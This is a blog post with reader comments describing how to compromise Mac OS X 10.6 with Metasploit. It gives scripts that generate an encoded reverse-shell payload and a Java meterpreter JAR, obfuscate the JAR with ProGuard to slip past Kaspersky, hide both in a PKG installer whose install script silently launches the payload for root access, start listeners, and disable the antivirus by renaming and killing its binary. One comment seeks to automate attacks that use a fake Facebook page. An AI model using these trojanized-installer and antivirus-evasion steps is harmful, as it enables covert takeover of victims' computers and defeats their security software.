Hacking OSX using Metasploit

OK, the next interesting exercise was with OSX. I dont have a powerful machine to run the latest Mountain Lion, but rather I have used the Snow Leopard 10.6.2  These findings are not new, main idea was taken from Darkoperators blog, but I will show some modifications and alternatives that I have came up with.

Most importantly I am doing the demo on OSX running Kaspersky Antivirus for Mac. At this point Kaspersky flags some payloads, some not. So it was fun bypassing and unloading it from memory. By the way, much easier on OSX then on Windows.

So firstly we have a OSX 32bit reverse shell  generator to create a source code for our executable:

echo "************************************************************"
echo "    Automatic  shellcode generator - FOR METASPLOIT         "
echo "                  By Astr0baby 2011                         "
echo "        TESTING FOR OSX 32bit tested on 10.6                "
echo "    For Automatic Teensy programming and deployment         "
echo "************************************************************"
echo -e "What IP are we gonna use ?  \c"
read IP
echo -e "What Port Number are we gonna listen to? : \c"
read port
./msfpayload   osx/x86/shell_reverse_tcp  LHOST=$IP LPORT=$port EXITFUNC=thread R | ./msfencode -e x86/call4_dword_xor  > test.c
mv test.c ShellCode
cd ShellCode
#Replacing plus signs at the end of line
sed -e 's/+/ /g' test.c > clean.c
sed -e 's/buf = /unsigned char micro[]=/g' clean.c > ready.c
echo "#include <stdio.h>" >> temp.c
cat ready.c >> temp.c
echo ";" >> temp.c
echo "int main(void) { ((void (*)())micro)();" >> temp.c
echo "}" >> temp.c
mv temp.c final.c
echo "final.c is ready in ShellCode, please compile it usig gcc on OSX"
rm -f clean.c
rm -f test.c
rm -f ready.c
rm -f rand.c
rm -f temp2
rm -f temp3
rm -f temp4

This will generate a c source file called final.c which we will compile using GCC on OSX (I am not aware of any cross-compiler enviroment to compile macho binaries in linux)


Next we need to generate and obfuscate a Java meterpreter JAR file. Java is present on OSX so it is a perfect method of deploying the meterpreter to the target. So Here is the script that generates it:

echo "************************************************************"
echo "    Automatic  shellcode generator - FOR METASPLOIT         "
echo "                  By Astr0baby 2011                         "
echo "        TESTING FOR OSX 32bit tested on 10.6                "  
echo "    For Automatic Teensy programming and deployment         "
echo "************************************************************"
echo -e "What IP are we gonna use ?  \c"
read IP 
echo -e "What Port Number are we gonna listen to? : \c"
read port
./msfpayload   java/meterpreter/reverse_tcp  LHOST=$IP LPORT=$port EXITFUNC=thread R  > test.jar  
mv test.jar ShellCode
echo "test.jar generated in ShellCode folder..."

Now the resulting test.jar will get flagged by Kaspersky AV, so we need to change it a little. For this I chose to use ProGuard 4.8 ProGuard I will show you here what I did to get by the AV heuristics with the jar file.

Next screenshots show the settings I have used to get past KAV on OSX.




So now that we have the obfuscated JAR file we can copy it over to the OSX because we need to pack it along with the first macho reverse shell payload.

The next step is to create a PKG for OSX that will include both files generated previously. I have used an Open Source Iceberg to create the PKG . Next screenshots show the process.


What is important is to include the script install.sh in a project path in Iceberg. The install.sh script looks like this:

/Applications/Utilities/OSXBin &

So when we execute the PKG this script calls the OSXBin binary which we have compiled first using GCC on OSX. Also we have included the JAR file for execution once we get the reverse shell.

Now we need to setup 2 listeners on our attacking machine, I use these scripts:

echo "***************************************************************"
echo "       Automatic  shellcode generator - FOR METASPLOIT         "
echo "       For Automatic Teensy programming and deployment         "
echo "***************************************************************"
echo "Here is a network device list available on yor machine" 
cat /proc/net/dev | tr -s  ' ' | cut -d ' ' -f1,2 | sed -e '1,2d'
echo -e "What network interface are we gonna use ?  \c"
read interface
echo -e "What Port Number are we gonna listen to? : \c"
read port
# Get OS name
IO="" # store IP
case $OS in
   Linux) IP=`/sbin/ifconfig $interface  | grep 'inet addr:'| grep -v '' | cut -d: -f2 | awk '{ print $1}'`;;
   *) IP="Unknown";;
echo "      starting the meterpreter listener.."
./msfcli exploit/multi/handler  PAYLOAD=osx/x86/shell_reverse_tcp   LHOST=$IP LPORT=$port  E

And the JAVA listener:

echo "***************************************************************"
echo "       Automatic  shellcode generator - FOR METASPLOIT         "
echo "       For Automatic Teensy programming and deployment         "
echo "***************************************************************"
echo "Here is a network device list available on yor machine"
cat /proc/net/dev | tr -s  ' ' | cut -d ' ' -f1,2 | sed -e '1,2d'
echo -e "What network interface are we gonna use ?  \c"
read interface
echo -e "What Port Number are we gonna listen to? : \c"
read port
# Get OS name
IO="" # store IP
case $OS in
   Linux) IP=`/sbin/ifconfig $interface  | grep 'inet addr:'| grep -v '' | cut -d: -f2 | awk '{ print $1}'`;;
   *) IP="Unknown";;
echo "      starting the meterpreter listener.."
./msfcli exploit/multi/handler  PAYLOAD=java/meterpreter/reverse_tcp   LHOST=$IP LPORT=$port  E

We need to specify different ports of course for the listening interfaces, I use 8080 and 8081.

So when the target OSX installs the PKG and gets prompted for a password we get a reverse root shell from which we can execute the JAVA meterpreter JAR file which would be dumped into /Applications/Utilities/obfuscated.jar

we execute it like so

#java -jar /Applications/Utilities/obfuscated.jar

And we get a meterpreter shell opening in a new window running with root privileges ! Next we kill the Antivirus by going into the AV directory where the main kav binary resides and renaming it to something else like old.kav

cd /Library/"Application Support"/"Kaspersky Lab"/KAV/Binaries
mv kav old.kav

Next we just kill -9 the kav PIDs and that is all. The above step is necessary otherwise kav process will respawn immediately after being killed.

I have made a video of the whole process to see here:

About astr0baby

Please run Adblock or similar... we have been told to do so since Carl Sagan wrote the Contact .
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15 Responses to Hacking OSX using Metasploit

  1. Pingback: Digital Forensics, Inc. Hacking OSX using Metasploit | Digital Forensics, Inc.

  2. Ian says:

    Have you wrote anything like this which focuises on Windows 7? Thanks

  3. d4rkr4y says:

    wow… very nice. post and blog. you are at the frontier man THX for sharing your hard work!!

  4. Armitage1989 says:

    Hello,a question is injected into memory ??? ” I mean bypass process explorer ?

  5. Armitage1989 says:

    Grace by reply to time … in his previous articles

    Comodo AV and Sandbox bypass

    Your code , is injected into memory , does not create processes on the system , or temporary files ??? This is my question … Astrobaby

  6. Armitage1989 says:


  7. Rodrigo says:

    hey this might be a stupid question but Im working with metasploit. I know how to do everyting and I’ve been successful. Im using SET, but after the exploitation has been succesful, (using a fake facebook) I need to run automatically a text file (notepad) saying the exploitation was successful. I know I can do it having access to the windows shell. but this need to be automated. Any thoughts in how to automate it? and run it automatically? thank youuuu

  8. shroeder says:

    I have a working jar file until I obfuscate it with ProGuard. After obfuscation I get the following errors:
    .com.apple.JarLauncher: at metasploit.Payload.a(Unknown Source)
    .com.apple.JarLauncher: at metasploit.Payload.main(Unknown Source)

    Any ideas on why this is happening?

    • astr0baby says:

      Not sure, is your OSX 64bit or 32bit ? Maybe there are some changes in the ProGuard, I have used version 4.8 there is 4.9 out now. Try experimenting with various settings in ProGuard.

  9. 127lh says:

    whats the password for the DEP fud generator

  10. Pingback: Hacking OSX with Metasploit | Hacking & Cyber Security

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